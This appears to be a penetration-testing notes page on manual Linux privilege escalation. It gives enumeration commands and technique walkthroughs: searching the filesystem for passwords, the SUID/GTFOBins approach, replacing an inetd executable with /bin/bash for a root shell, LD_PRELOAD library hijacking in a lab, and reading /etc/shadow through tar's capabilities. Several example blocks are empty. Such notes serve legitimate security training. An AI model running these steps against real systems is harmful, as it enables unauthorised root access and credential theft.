search

Linux

Manual privilege escalation techniques to look for

hashtag
Information gathering

The first step when landing on host should be understanding who your against to - what OS, what process are running, what users exists and more, this can be done by looking at the following files (remember - in Linux everything is a file):

hashtag
Distribution type:

cat /etc/*-release

hashtag
Kernel version:

cat /proc/version uname -a

hashtag
view if you can run anything as sudo: (check for GTFObins)

Sudo -l

hashtag
Check common files: 

cat /etc/profile 
cat /etc/bashrc 
cat ~/.bash_history 
cat ~/.bashrc 
cat ~/.bash_logout

hashtag
What services running (filter by root):

ps aux

ps -efww - in full screen

ps -ef

top

hashtag
Check configuration files:

hashtag
Check local ports and what listens:

netstat -antup

hashtag
View list of users:

cat /etc/passwd | cut -d: -f1

hashtag
Search for ssh keys:

hashtag
View crontabs

hashtag
Web servers files

hashtag
Useful Find Comands

hashtag
Find Binaries that will execute as the owner (SUID):

find / -perm -u=s -type f 2>/dev/null

hashtag
Find binaries that will execute as the group (GUID):

find / -perm -g=s -type f 2>/dev/null

hashtag
Find sticky-bit binaries:

find / -perm -1000 -type d 2>/dev/null

hashtag
Find files which were created in the last 5 minutes:

find . -mtime -5 -type f -print 2>/dev/null

hashtag
Find certain files:

find / -name foo.txt -type f

hashtag
Wildcard search:

find . -name "*.txt"

hashtag
Find and ls:

find . -type f -name "Foo*" -exec ls -l

hashtag
Find world writable folders:

find / -writable -type d 2>/dev/null # world-writeable folders

find / -perm -222 -type d 2>/dev/null # world-writeable folders

find / -perm -o w -type d 2>/dev/null # world-writeable folders

find / -perm -o x -type d 2>/dev/null # world-executable folders

find / \( -perm -o w -perm -o x \) -type d 2>/dev/null # world-writeable & executable folders

hashtag
Files containing passwords:

grep --color=auto -rnw '/' -ie "PASSWORD" --color=always 2> /dev/null find . -type f -exec grep -i -I "PASSWORD" {} /dev/null \;

hashtag
Sudo misconfiguration

A common privilege escalation technique, find misconfigred sudo instance where you can run a software with root privileges (or any other users).

A list of softwares and how to esclate privileges can be found here:

https://gtfobins.github.io/arrow-up-right

GTFOBins is a curated list of Unix binaries that can be exploited by an attacker to bypass local security restrictions.

Example:

A offline version of GTFOBins:

https://github.com/nccgroup/GTFOBLookuparrow-up-right

Example:

hashtag
inetd

cat /etc/inetd.conf Look for write permissions on any of the executables listed in this config file. If you have write permissions replace the executable i.e. cp /bin/bash /usr/sbin/in.rshd

inetd will now serve the /bin/bash shell running with root privileges when we connect to the rshd default port 514:

telnet remote_ip_address 514

From <https://www.engetsu-consulting.com/tag/Linux-Privilege-Escalationarrow-up-right>

hashtag
Dynamically Linked Shared Object Library

Find SUID or GUID

find / -perm -g=s -o -perm -u=s -type f 2>/dev/null

Find a executable which looks suspicious and shouldn't be there:

Trying to run the file:

james@attackdefense:~/.lib$ /usr/local/bin/welcome/usr/local/bin/welcome: symbol lookup error: /usr/local/bin/welcome: undefined symbol: greetings

Check what shared libraries are used:

We will use LD_PRELOAD - LD_PRELOAD is an optional environmental variable containing one or more paths to shared libraries, or shared objects, that the loader will load before any other shared library including the C runtime library (libc.so) This is called preloading a library.

First we will need to create a malicious file instead of the missing library

use the SUID Shell code and compile the code

james@attackdefense:~/.lib$ gcc -o libgreetings.so lib.c -shared

  • the '-shared' is to compile it as a shared library file (.so)

Load the file with the new library:

james@attackdefense:~/.lib$ LD_PRELOAD=/home/james/.lib/libgreetings.so /usr/local/bin/welcome

Run it:

hashtag
Abuse Capabilities utility

Capabilities are a little obscure but similar in principle to SUID. Linux’s thread/process privilege checking is based on capabilities: flags to the thread that indicate what kind of additional privileges they’re allowed to use. By default, root has all of them.

Capabilities are useful when you want to restrict your own processes after performing privileged operations (e.g. after setting up chroot and binding to a socket). However, they can be exploited by passing them malicious commands or arguments which are then run as root.

*Used with GTFOBins

Find out what capabilities are Enabled

[user@box ~]$ getcap -r / 2>/dev/null

You will get output like the following…

hashtag
CAP_DAC_READ_SEARCH

For example if we found

/home/nxnjz/tar = cap_dac_read_search+ep

tar has cap_dac_read_search capabilities. This means it has read access to anything. We could use this to read SSH keys, or /etc/shadow and get password hashes.

But since tar has that capability, we can archive /etc/shadow, extract it from the archive and read it.

hashtag
CAP_setuid

hashtag
CAP_NET_RAW

Can capture data as root

Tcpdump -ni {Interface}

PreviousCommon ExploitsNextSUID Shell script

Last updated